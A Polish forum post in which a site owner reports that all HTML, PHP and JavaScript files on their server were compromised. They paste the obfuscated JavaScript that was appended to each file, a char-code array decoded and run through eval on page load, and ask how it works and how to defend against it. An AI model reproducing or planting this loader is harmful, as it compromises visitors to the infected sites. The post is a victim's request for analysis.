Witam
Dziś zorientowałem się, że wszystkie pliki HTML, PHP i JavaScript na moim serwerze zostały shackowane. Do każdego z nich został dopisany następujący kod:
/*336988*/
try{window.document.body++}catch(gdsgsdg){dbshre=110;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,115,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,115,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,110,111,112,40,92,91,110,90,104,94,92,92,97,91,100,105,92,94,109,100,94,102,104,93,92,99,89,39,93,106,100,39,93,91,111,88,39,107,95,103,37,104,97,106,34,50,5,3,26,27,23,24,113,40,110,107,113,101,95,41,103,103,108,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,114,41,106,108,114,102,96,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,111,38,108,110,116,99,93,39,98,96,96,95,97,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,115,37,107,109,115,103,92,38,112,99,95,107,96,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,113,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,115,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,31,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,113,33,36,32,24,116,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,115,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,113,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,114,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s="";for(i=0;i-465!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}
/*/336988*/
Czy ktoś może powiedzieć, co ten kod robi, w jaki sposób się on rozprzestrzenia, jak serwer mógł zostać zainfekowany, oraz jak się przed tym bronić?